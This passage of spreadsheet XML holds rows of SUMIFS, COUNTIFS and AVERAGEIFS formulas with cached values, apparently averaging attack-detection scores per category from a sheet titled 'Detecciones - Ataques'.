        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG138" s="271"/>
      <c r="AH138" s="386" t="s">
        <v>2557</v>
      </c>
      <c r="AI138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="AJ138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3521052632</v>
      </c>
      <c r="AR138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY138" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB138" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="BD138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="BN138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="BO138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="BR138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA138" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC138" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="CJ138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="CP138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CQ138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH138" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI138" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ138" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK138" s="271"/>
    </row>
    <row r="139">
      <c r="J139" s="277"/>
      <c r="K139" s="512"/>
      <c r="L139" s="512"/>
      <c r="M139" s="512"/>
      <c r="N139" s="512"/>
      <c r="O139" s="278"/>
      <c r="Q139" s="271"/>
      <c r="R139" s="386" t="s">
        <v>2558</v>
      </c>
      <c r="S139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3351228241</v>
      </c>
      <c r="T139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.448433584</v>
      </c>
      <c r="V139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W139" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.3471070467</v>
      </c>
      <c r="AA139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.6153846154</v>
      </c>
      <c r="AB139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AC139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.6</v>
      </c>
      <c r="AD139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE139" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.4</v>
      </c>
      <c r="AF139" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG139" s="271"/>
      <c r="AH139" s="386" t="s">
        <v>2558</v>
      </c>
      <c r="AI139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="AJ139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1</v>
      </c>
      <c r="AL139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ139" s="518">
